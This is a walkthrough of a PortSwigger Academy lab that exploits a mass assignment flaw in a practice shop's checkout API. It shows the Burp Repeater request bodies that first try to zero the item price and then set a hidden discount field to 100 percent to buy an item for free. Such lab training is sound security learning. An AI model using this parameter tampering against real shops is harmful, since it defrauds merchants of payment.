ervinismu

PortSwigger Academy - Exploiting a mass assignment vulnerability

2 min read

Lab: Exploiting a mass assignment vulnerability

Pre

  1. open burp suite
  2. open lab url in burp proxy browser
  3. login as wiener using credential wiener:peter

Observe

  1. do checkout flow from add to "Chart" to "Place Order"
  2. read HTTP History in burp proxy and we found some endpoints:
    1. GET /api/checkout HTTP/2: when open"Cart Page"
    2. POST /api/checkout HTTP/2: when click "Place Order"
    3. {host}/api/: api documentation page

Possibility mass assignment in product price

  1. response api GET /api/checkout contain some interesting field:
{
	"chosen_discount":{
		"percentage":0 // LEGIT
	},
	"chosen_products":[
		{
			"product_id":"1",
			"name":"Lightweight \"l33t\" Leather Jacket",
			"quantity":1,
			"item_price":133700 // LEGIT
		}
	]
}
  1. field chosen_products.item_price looks legit, we might to set the item_price to 0 when checkout
  2. send endpoint POST /api/checkout to burp repeater, and change request body to:
{
	"chosen_products":[
		{
			"product_id":"1",
			"quantity":1,
			"item_price":0 // we add this field and set value to 0, to check possibility change item price
		}
	]
}
  1. send request, but we still got response INSUFFICIENT_FUNDS, looks like it didn’t work
HTTP/2 201 Created
Location: /cart?err=INSUFFICIENT_FUNDS
X-Frame-Options: SAMEORIGIN
Content-Length: 0
  1. we need to explore other parameter possibility

Solution

  1. since parameter chosen_products.item_price didn’t work, we try to explore other legit parameter.
  2. we found other legit parameter named chosen_discount.percentage, looks like it used to set discount when checkout, and parameter chosen_discount_percentage are represent percent in integer value.
  3. send endpoint POST /api/checkout to burp repeater again, and change request body to:
{
	"chosen_discount":{
		"percentage":100 // for set discount 100%
	},
	"chosen_products":[
		{
			"product_id":"1",
			"quantity":1
		}
	]
}
  1. we set chosen_discount.percentage to 100, since our store credit are $0 we want to "Place Order" with discount 100% no need to paid.
  2. click send and we got response success
HTTP/2 201 Created
Location: /cart/order-confirmation?order-confirmed=true
X-Frame-Options: SAMEORIGIN
Content-Length: 0

lab solved

Graph View